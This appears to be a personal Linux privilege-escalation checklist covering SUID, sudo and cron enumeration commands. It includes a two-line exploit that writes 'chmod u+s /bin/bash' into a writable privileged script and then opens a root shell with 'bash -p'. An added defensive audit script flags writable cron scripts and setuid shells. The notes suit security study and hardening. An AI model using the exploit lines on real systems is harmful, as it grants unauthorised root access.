Checklist (priv esc)

Note: the Linux page has a few notes, in case you missed it

  1. Check Linux OS version

  2. Check kernel version (uname -a)

  3. Check SUID binaries (find / -perm -4000 -ls 2>/dev/null)

  4. Run sudo -l to see which commands that user is allowed to run through sudo

    1. Check https://gtfobins.github.io/ for sudo binary exploits

  5. Check cron jobs (/etc/cronjobs)

    1. If you can't check root's cron jobs directly, pspy might help

    2. Run grep -nrw /dir/to/search/in -e "/path/of/script_or_file" 2>/dev/null to check whether any file runs or uses that file.

Edit access on sudo script

echo 'chmod u+s /bin/bash' > /path/to/script/file.sh

#then type
/bin/bash -p #to get root shell
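
The same conditions can be checked from the admin side before anyone else finds them. This is an added example, not part of the original notes: it flags scripts referenced by cron files that a non-root user could modify, and shells that carry the setuid bit. The function names and the TRUSTED_UID variable are made up for the example, and it assumes a find that supports -maxdepth (GNU, BSD, busybox).

```shell
#!/bin/sh
# Added example, not from the original notes. Audits the conditions the
# checklist looks for so they can be fixed first.
TRUSTED_UID="${TRUSTED_UID:-0}"   # assumption: privileged scripts belong to uid 0

# True (0) if the path, or the directory holding it, can be changed by anyone
# other than TRUSTED_UID: different owner, or a group/world write bit.
is_tamperable() {
    for p in "$1" "$(dirname "$1")"; do
        [ -e "$p" ] || continue   # a missing script is judged by its directory
        if [ -n "$(find -L "$p" -maxdepth 0 \
              \( ! -user "$TRUSTED_UID" -o -perm -020 -o -perm -002 \) 2>/dev/null)" ]; then
            return 0
        fi
    done
    return 1
}

# True (0) if a regular file carries the setuid bit (what `chmod u+s` leaves).
has_setuid() {
    [ -n "$(find -L "$1" -maxdepth 0 -type f -perm -4000 2>/dev/null)" ]
}

# Print the absolute paths named in a crontab-style file (unquoted, space-free
# paths only; /dev/* redirect targets are skipped).
cron_paths() {
    awk '!/^[ \t]*#/ { for (i = 1; i <= NF; i++)
             if ($i ~ /^\// && $i !~ /^\/dev\//) print $i }' "$1" | sort -u
}

# audit CRONFILE...: report tamperable paths referenced by the cron files and
# setuid shells from /etc/shells. Returns 0 only when nothing was found.
audit() {
    findings=0
    for f in "$@"; do
        [ -r "$f" ] || continue
        for s in $(cron_paths "$f"); do
            is_tamperable "$s" || continue
            echo "WRITABLE: $s (referenced by $f)"; findings=$((findings + 1))
        done
    done
    for s in $(grep -v '^#' /etc/shells 2>/dev/null); do
        has_setuid "$s" || continue
        echo "SETUID SHELL: $s"; findings=$((findings + 1))
    done
    [ "$findings" -eq 0 ]
}

if [ "$#" -gt 0 ]; then audit "$@"; fi
```

Run it as root with the cron files as arguments, for example /etc/crontab and the files under /etc/cron.d. A WRITABLE finding is fixed with chown root and chmod go-w on the script and its directory, a SETUID SHELL finding with chmod u-s on the shell.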
